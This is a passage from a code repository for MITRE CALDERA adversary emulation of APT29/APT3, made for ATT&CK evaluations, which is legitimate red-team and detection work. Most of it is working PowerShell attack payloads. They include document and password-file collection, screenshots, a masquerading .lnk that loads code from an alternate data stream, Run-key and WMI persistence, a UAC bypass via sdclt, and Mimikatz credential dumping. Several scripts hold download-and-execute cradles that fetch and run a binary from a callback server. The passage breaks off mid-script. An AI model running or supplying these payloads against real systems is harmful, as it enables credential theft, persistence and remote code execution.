4b2e9574-b1a7-4b38-95b2-6054ded9c4fe # Restart computer to trigger persistence mechanisms 70 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/e55da81a-9ce7-4da8-8313-074362fd5dee.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | id: e55da81a-9ce7-4da8-8313-074362fd5dee 4 | name: ATT&CK Eval APT3 - 10 5 | description: Execution of Persistence 6 | visible: 1 7 | phases: 8 | 1: 9 | - 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/ef93dd1b-809b-4a0b-b686-fef549cabbe4.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | id: ef93dd1b-809b-4a0b-b686-fef549cabbe4 4 | name: ATT&CK Eval APT3 - Full 5 | description: full evaluation 6 | visible: 1 7 | phases: 8 | 1: 9 | - ee08a427-1e1d-4d8a-aeb1-978a7fcf9087 # 2.A.1 10 | - 64f1fcb4-399d-4f3b-9a6b-13ec00e1c2ce # 2.A.2 11 | 2: 12 | - 35d95b64-c1f8-4ac7-a2f2-8959218239cd # 2.B.1 13 | 3: 14 | - 5df12481-9d8c-4235-b550-9cefc8ed7361 # 2.C.1 15 | - 41610306-087c-4c34-874b-37b8ed633a36 # 2.C.2 16 | 4: 17 | - 2ff877b4-0c00-401e-9d3f-070c70b610df # 2.D.1 18 | - 144b1384-5060-494f-80eb-91772695cdf3 # 2.D.2 19 | 5: 20 | - d2ea2676-7f85-4228-b980-ab3c0e1adc03 # 2.E.1 21 | - 7c2a6e5b-1adb-464f-a581-4677391f8dd6 # 2.E.2 22 | 6: 23 | - faa96e7f-081a-40b7-a743-a6a7f2627ea3 # 2.F.1 24 | - 26181249-be75-41ed-9fe7-5c30ea8c2d4d # 2.F.2 25 | - 84377d7a-0363-44fd-a082-44657ca1858f # 2.F.3 26 | 7: 27 | - 61221fb9-cb32-46d5-98fd-90567a621526 # 2.G.1 28 | - 9ce5bf9f-44ec-44c4-bbe0-6d68a83e1b76 # 2.G.2 29 | 8: 30 | - 5c23f638-9cfc-4fc4-9cab-4af628fef70a # 2.H.1 31 | 9: 32 | - 1345bff7-6f26-43b2-a92a-9aabccdb3db0 # 3.A.1 33 | 10: 34 | - 088b8639-3f37-42cc-9dc8-01aabb645461 # 3.B.1 - 3.C.1 35 | 11: 36 | - 59592c35-8207-4896-8d8b-36ad4600245d # 4.A.1 37 | - 24ed020e-4730-4000-b6b4-6b5d3e95314f # 4.A.2 38 | 12: 39 | - 5f4263c4-7ff1-4098-b5f5-f41faa31cf5b # 4.B.1 40 | 13: 41 | - ba0b398d-91b8-490a-bed2-f959afa8e1aa # 4.C.1 42 | 14: 43 | - 4ef6009d-2d62-4bb4-8de9-0458df2e9567 # 5.A.1 44 | 15: 45 | - effbedc1-1bc8-4a75-9395-980559700008 # 5.A.2 46 | 16: 47 | - 03afada1-1714-408f-bde5-f528b91dc89d # 5.B.1 - 8.A.2 48 | 17: 49 | - 0b1841bd-ef8b-475c-bce7-8fcb2860984a # 8.D.1 50 | 18: 51 | - d5170a60-3bdc-44e0-9870-a38db5c0cf81 # 9.A.1 52 | - 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6 # 9.B.1 53 | 19: 54 | - 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe # 10.A.1 - 10.A.2 55 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/sources/4fb34bde-b06d-445a-a146-8e35f79ce546.yml: -------------------------------------------------------------------------------- 1 | facts: 2 | - trait: target.domain.name 3 | value: TGTDOMAIN.lan 4 | - trait: target.winrm.username 5 | value: WINRM_USR 6 | - trait: target.winrm.password 7 | value: WINRM_PASS 8 | - trait: target.winrm.remote_host 9 | value: WINRM_REMOTE_HOST 10 | - trait: pivot_machine_hostname 11 | value: PIVOT_HOST_NAME 12 | - trait: 7zip_password 13 | value: abc123 14 | - trait: profile_user 15 | value: PROFILE_USER 16 | - trait: profile_user_password 17 | value: PROFILE_USER_PASSWORD 18 | - trait: profile_user_day2 19 | value: PROFILE_USER_DAY_2 20 | - trait: profile_user_password_day2 21 | value: PROFILE_USER_DAY_2_PASSWORD 22 | - trait: onedrive.username 23 | value: ONEDRIVE_USERNAME@outlook.com 24 | - trait: onedrive.url 25 | value: ONEDRIVE_URL 26 | - trait: onedrive.password 27 | value: ONEDRIVE_PASSWORD 28 | 29 | id: 4fb34bde-b06d-445a-a146-8e35f79ce546 30 | name: evals-round-2 31 | rules: [] 32 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/hook.py: -------------------------------------------------------------------------------- 1 | from plugins.evals.app.gui_api import GuiApi 2 | 3 | name = 'Evals' 4 | description = 'A plugin to start the DIY ATT&CK Based Evaluations with CALDERA' 5 | address = '/plugin/evals/gui' 6 | 7 | async def enable(services): 8 | app = services.get('app_svc').application 9 | file_svc = services.get('file_svc') 10 | gui_api = GuiApi(services=services) 11 | 12 | #app.router.add_static('/evals', 'plugins/evals/static/', append_version=True) 13 | app.router.add_route('GET', '/plugin/evals/gui', gui_api.splash) 14 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/0-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/0-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/1-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/1-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/10-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/10-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/11-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/11-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/12-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/12-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/2-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/2-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/3-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/3-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/4-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/4-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/5-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/5-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/6-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/6-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/7-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/7-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/8-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/8-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/9-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/9-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/CALDERA-APT29-README.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/CALDERA-APT29-README.tar -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/File-Collection.ps1: -------------------------------------------------------------------------------- 1 | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 2 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Get-Screenshot.ps1: -------------------------------------------------------------------------------- 1 | function Get-Screenshot 2 | { 3 | <# SOURCE: https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-Screenshot.ps1 #> 4 | param 5 | ( 6 | [Parameter(Mandatory = $False)] 7 | [string] 8 | $Ratio 9 | ) 10 | Add-Type -Assembly System.Windows.Forms; 11 | $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen; 12 | $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height; 13 | $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject); 14 | $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size); 15 | $DrawingGraphics.Dispose(); 16 | $ms = New-Object System.IO.MemoryStream; 17 | if ($Ratio) { 18 | try { 19 | $iQual = [convert]::ToInt32($Ratio); 20 | } catch { 21 | $iQual=80; 22 | } 23 | if ($iQual -gt 100){ 24 | $iQual=100; 25 | } elseif ($iQual -lt 1){ 26 | $iQual=1; 27 | } 28 | $encoderParams = New-Object System.Drawing.Imaging.EncoderParameters; 29 | $encoderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $iQual); 30 | $jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" } 31 | $ScreenshotObject.save($ms, $jpegCodec, $encoderParams); 32 | } else { 33 | $ScreenshotObject.save($ms, [Drawing.Imaging.ImageFormat]::Png); 34 | } 35 | $ScreenshotObject.Dispose(); 36 | [convert]::ToBase64String($ms.ToArray()); 37 | } 38 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/README.md: -------------------------------------------------------------------------------- 1 | ### Payloads Explained 2 | * ```2016_United_States_presidential_election_-_Wikipedia.html```: Staging payload for ADFS. 3 | * ```cod.3aka.scr.exe```: Sandcat payload to complete RTLO execution. 4 | * ``` dmevals.local.pfx```: Staged private key used for Get-PrivateKey discovery. 5 | * ``` File-Collection.ps1```: PowerShell script to collect the following: 6 | * *.doc 7 | * *.xps 8 | * *.xls 9 | * *.ppt 10 | * *.pps 11 | * *.wps 12 | * *.wpd 13 | * *.ods 14 | * *.odt 15 | * *.lwp 16 | * *.jtd 17 | * *.pdf 18 | * *.zip 19 | * *.rar 20 | * *.docx 21 | * *.url 22 | * *.xlsx 23 | * *.pptx 24 | * *.ppsx 25 | * *.pst 26 | * *.ost 27 | * *psw* 28 | * *pass* 29 | * *login* 30 | * *admin* 31 | * *sifr* 32 | * *sifer* 33 | * *vpn 34 | * *.jpg 35 | * *.txt 36 | * *.lnk 37 | * ``` Get-Screenshot.ps1```: [PowerShell Empire Script](https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-Screenshot.ps1) script to take screenshots. 38 | * ``` Invoke-BypassUACTokenManipulation.ps1```: [PowerShell Empire script](https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-BypassUACTokenManipulation.ps1) to bypass UAC. 39 | * ``` Invoke-Mimikatz.ps1```: [PowerShell Empire PowerShell script](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Mimikatz.ps1) to execute Mimikatz. 40 | * ``` Invoke-PSInject.ps1```: [PowerShell Empire PowerShell script](https://github.com/EmpireProject/Empire/blob/master/data/module_source/management/Invoke-PSInject.ps1) to execute base64 encoded PowerShell code. 41 | * ``` invoke-winrmsession.ps1```: [PoshC2 script](https://github.com/nettitude/PoshC2/blob/master/resources/modules/Invoke-WinRMSession.ps1) to create winrm sessions. 42 | * ``` make_lnk.ps1```: Payload generation script to create masqumasquerading .lnk file 43 | * ``` m.exe```: [Mimikatz](https://github.com/gentilkiwi/mimikatz) executable. 44 | * ``` MITRE-ATTACK-EVALS.HTML```: Staged .html only used for Discovery. 45 | * ``` Modified-SysInternalsSuite.zip```: Utilities used in persistence mechanisms that are stored within a SysInternals directory. 46 | 47 | **Note, none of the utilities here are actually Windows SysInternals tools. 48 | The SysInternals is downloaded from Microsoft during Day-1 A execution.** 49 | 50 | * ``` monkey.png```: Stenography png with encoded payload. 51 | * ``` powerview.ps1```: Powerview functions to execute reflective loading. 52 | * ``` ps.ps1```: Process enumeration. 53 | * ``` rar.exe```: Archive utility. 54 | * ``` sandcat.go-windows```: Sandcat binary. 55 | * ``` sandcat.go-windows-upx```: UPX packed Sandcat binary. 56 | * ``` schemas.ps1```: Payload generation script using alternate data streams. 57 | * ``` setup.py```: Setup utility to update all payloads with appropriate IP:PORT. 58 | * ``` StealToken.ps1```: Steal a process' token. 59 | * ``` stepFifteen_wmi.ps1```: WMI persistence. 60 | * ``` stepFourteen_bypassUAC.ps1```: UAC bypass via sdclt.exe. 61 | * ``` stepFourteen_credDump.ps1```: WMI Based credential dump. 62 | * ``` stepSeventeen_email.ps1```: Outlook e-mail enumeration. 63 | * ``` stepSeventeen_zip.ps1```: Zip up a directory. 64 | * ``` stepSixteen_SID.ps1```: Get SID of user. 65 | * ``` stepThirteen.ps1```: Discovery functions. 66 | * ``` stepTwelve.ps1```: Detect AntiVirus. 67 | * ``` timestomp.ps1```: Timestomp a file. 68 | * ``` update.ps1```: Update sandcat payload. 69 | * ``` upload.ps1```: CALDERA upload utility. 70 | * ``` wipe.ps1```: Reflectivly load sdelete64.exe. 71 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/dmevals.local.pfx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/dmevals.local.pfx -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/invoke-winrmsession.ps1: -------------------------------------------------------------------------------- 1 | Function Get-RandomName 2 | { 3 | param ( 4 | [int]$Length 5 | ) 6 | $set = 'abcdefghijklmnopqrstuvwxyz'.ToCharArray() 7 | $result = '' 8 | for ($x = 0; $x -lt $Length; $x++) 9 | {$result += $set | Get-Random} 10 | return $result 11 | } 12 | Function Invoke-WinRMSession { 13 | param ( 14 | $username, 15 | $Password, 16 | $IPAddress 17 | ) 18 | $PSS = ConvertTo-SecureString $password -AsPlainText -Force 19 | $getcreds = new-object system.management.automation.PSCredential $username,$PSS 20 | 21 | return (New-PSSession -ComputerName $IPAddress -Credential $getcreds) 22 | } 23 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/m.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/m.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/make_lnk.ps1: -------------------------------------------------------------------------------- 1 | $destination = "37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk" 2 | $shell = New-Object -COM WScript.Shell 3 | $shortcut = $shell.CreateShortcut($destination) 4 | $shortcut.TargetPath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 5 | $shortcut.Arguments = "Get-Content '.\2016_United_States_presidential_election_-_Wikipedia.html' -Stream schemas | IEX" 6 | $shortcut.Description = "The Shocking Truth About Election Rigging in America" 7 | $shortcut.Save() 8 | Add-Content -Path '.\2016_United_States_presidential_election_-_Wikipedia.html' -Value $(Get-Content .\schemas.ps1) -Stream schemas -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/monkey.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/monkey.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/rar.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/rar.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/sandcat.go-windows: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/sandcat.go-windows -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/sandcat.go-windows-upx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/sandcat.go-windows-upx -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/schemas.ps1: -------------------------------------------------------------------------------- 1 | gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_BIOS" 2 | gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_PnPEntity" 3 | gwmi -namespace root\cimv2 -query "Select * from Win32_ComputerSystem" 4 | gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_Process" 5 | (Get-Item -Path ".\" -Verbose).FullName 6 | $bin = "" 7 | $bin | Add-Content -Path blob 8 | certutil -decode blob "$env:appdata\Microsoft\kxwn.lock" 9 | Remove-Item -Path blob 10 | New-ItemProperty -Force -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "WebCache" -Value "C:\windows\system32\rundll32.exe $env:appdata\Microsoft\kxwn.lock,VoidFunc" 11 | $ps_cradle = '$server="http://192.168.0.4:8888";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","sandcat.go");$data=$wc.DownloadData($url);$name="iex-cradle";get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f;rm -force "C:\Users\Public\$name.exe" -ea ignore;[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null;Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group iex-cradle" -WindowStyle hidden;' 12 | IEX($ps_cradle) 13 | Invoke-Item '2016_United_States_presidential_election_-_Wikipedia.html' 14 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/setup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import fileinput 3 | import re 4 | import os 5 | 6 | def main(): 7 | server = input("Enter callback server http[s]://IP:PORT: ") 8 | 9 | for filename in os.listdir(): 10 | extension = os.path.splitext(filename)[1] 11 | 12 | if extension != ".ps1" and extension != ".txt": 13 | continue 14 | 15 | with fileinput.FileInput(filename, inplace=True) as FILE: 16 | for line in FILE: 17 | # http://IP:PORT or https://IP:PORT 18 | print(re.sub(r'https?:\/\/((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?):\d{1,6}', server, line), end='') 19 | 20 | print("Done!") 21 | 22 | if __name__ == "__main__": 23 | main() 24 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFifteen_wmi.ps1: -------------------------------------------------------------------------------- 1 | function wmi { 2 | 3 | $FilterArgs = @{name='WindowsParentalControlMigration'; 4 | EventNameSpace='root\CimV2'; 5 | QueryLanguage="WQL"; 6 | Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LoggedOnUser' AND TargetInstance.__RELPATH like '%$($env:UserName)%'";} 7 | $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs 8 | 9 | $ConsumerArgs = @{name='WindowsParentalControlMigration'; 10 | CommandLineTemplate='PowerShell.exe -C $server="http://192.168.0.4:8888";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","sandcat.go");$data=$wc.DownloadData($url);$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f;rm -force "C:\Users\Public\$name.exe" -ea ignore;[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null;Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group red-wmi" -WindowStyle hidden;'} 11 | $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs 12 | 13 | $FilterToConsumerArgs = @{ 14 | Filter = [Ref] $Filter 15 | Consumer = [Ref] $Consumer 16 | } 17 | $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs 18 | } 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1: -------------------------------------------------------------------------------- 1 | function bypass { 2 | New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value 'powershell -exec bypass -Noninteractive -windowstyle hidden $server="http://192.168.0.4:8888";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","sandcat.go");$data=$wc.DownloadData($url);$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f;rm -force "C:\Users\Public\$name.exe" -ea ignore;[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null;Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group bypass-UAC" -WindowStyle hidden;' 3 | New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" 4 | Start-Process -FilePath $env:windir\system32\sdclt.exe 5 | Start-Sleep -s 3 6 | Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse 7 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_credDump.ps1: -------------------------------------------------------------------------------- 1 | function wmidump { 2 | # Change $server to Caldera server ip 3 | $server = "http://192.168.0.4:8888/file/download" 4 | $wc = New-Object System.Net.WebClient; $wc.Headers.Add("file","m.exe"); $wc.DownloadFile($server,"m.exe"); $ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo; $ProcessInfo.FileName = "m.exe"; $ProcessInfo.RedirectStandardError = $true; $ProcessInfo.RedirectStandardOutput = $true; $ProcessInfo.UseShellExecute = $false; $ProcessInfo.Arguments = @("privilege::debug","sekurlsa::logonpasswords","exit"); $Process = New-Object System.Diagnostics.Process; $Process.StartInfo = $ProcessInfo; $Process.Start() | Out-Null; $output = $Process.StandardOutput.ReadToEnd(); $Pws = ""; ForEach ($line in $($output -split "`r`n")) {if ($line.Contains('Password') -and ($line.length -lt 50)) {$Pws += $line}}; $PwBytes = [System.Text.Encoding]::Unicode.GetBytes($Pws); Set-WmiInstance -Path \\.\root\cimv2:Win32_AuditCode -Argument @{Result=$PwBytes} 5 | 6 | $newClass = New-Object System.Management.ManagementClass("root\cimv2", [String]::Empty, $null) 7 | $newClass["__CLASS"] = "Win32_AuditCode" 8 | $newClass.Qualifiers.Add("Static", $true) 9 | $newClass.Properties.Add("Code", [System.Management.CimType]::String, $false) 10 | $newClass.Properties["Code"].Qualifiers.Add("key", $true) 11 | $newClass.Properties["Code"].Value = $wc 12 | $newClass.Properties.Add("Result", [System.Management.CimType]::String, $false) 13 | $newClass.Properties["Result"].Qualifiers.Add("Key", $true) 14 | $newClass.Properties["Result"].Value = "" 15 | $newClass.Put() 16 | Start-Sleep -s 5 17 | $p = [wmiclass]"\\.\root\cimv2:Win32_Process" 18 | $s = [wmiclass]"\\.\root\cimv2:Win32_ProcessStartup" 19 | $s.Properties['ShowWindow'].value=$false 20 | $code = ([wmiclass]"\\.\root\cimv2:Win32_AuditCode").Properties["Code"].value 21 | $p.Create("powershell.exe $code") 22 | $ps = Get-Process powershell | select starttime,id | Sort-Object -Property starttime | select -last 1 | select -expandproperty id 23 | Get-Process powershell | select starttime,id 24 | $ps 25 | Wait-Process -Id $ps 26 | $Text = Get-WmiObject -Class Win32_AuditCode -NameSpace "root\cimv2" | Select -ExpandProperty Result 27 | return $Text 28 | } 29 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepSeventeen_email.ps1: -------------------------------------------------------------------------------- 1 | function psemail { 2 | Add-type -assembly "Microsoft.Office.Interop.Outlook" | out-null 3 | $olFolders = "Microsoft.Office.Interop.Outlook.olDefaultFolders" -as [type] 4 | $outlook = new-object -comobject outlook.application 5 | $namespace = $outlook.GetNameSpace("MAPI") 6 | $folder = $namespace.getDefaultFolder($olFolders::olFolderInBox) 7 | $folder.items | Select-Object -Property Subject, ReceivedTime, SenderName, Body 8 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepSeventeen_zip.ps1: -------------------------------------------------------------------------------- 1 | function zip( $zipfilename, $sourcedir ) 2 | { 3 | Add-Type -Assembly System.IO.Compression.FileSystem 4 | $compressionLevel = [System.IO.Compression.CompressionLevel]::Optimal 5 | [System.IO.Compression.ZipFile]::CreateFromDirectory($sourcedir, $zipfilename, $compressionLevel, $false) 6 | Start-Sleep -s 3 7 | $fileContent = get-content $zipfilename 8 | $fileContentBytes = [System.Text.Encoding]::UTF8.GetBytes($fileContent) 9 | $fileContentEncoded = [System.Convert]::ToBase64String($fileContentBytes) 10 | $fileContentEncoded | set-content $zipfilename 11 | [Byte[]] $x = 0x47,0x49,0x46,0x38,0x39,0x61 12 | $save = get-content $zipfilename 13 | $x | set-content $zipfilename -Encoding Byte 14 | add-content $zipfilename $save 15 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepThirteen.ps1: -------------------------------------------------------------------------------- 1 | function comp { 2 | $Signature=@" 3 | [DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Auto)] 4 | static extern bool GetComputerNameEx(COMPUTER_NAME_FORMAT NameType,string lpBuffer, ref uint lpnSize); 5 | enum COMPUTER_NAME_FORMAT 6 | {ComputerNameNetBIOS,ComputerNameDnsHostname,ComputerNameDnsDomain,ComputerNameDnsFullyQualified,ComputerNamePhysicalNetBIOS,ComputerNamePhysicalDnsHostname,ComputerNamePhysicalDnsDomain,ComputerNamePhysicalDnsFullyQualified} 7 | public static string GCN() { 8 | bool success; 9 | string name = " "; 10 | uint size = 20; 11 | success = GetComputerNameEx(COMPUTER_NAME_FORMAT.ComputerNameNetBIOS, name, ref size); 12 | return "NetBIOSName:\t" + name.ToString(); 13 | } 14 | "@ 15 | Add-Type -MemberDefinition 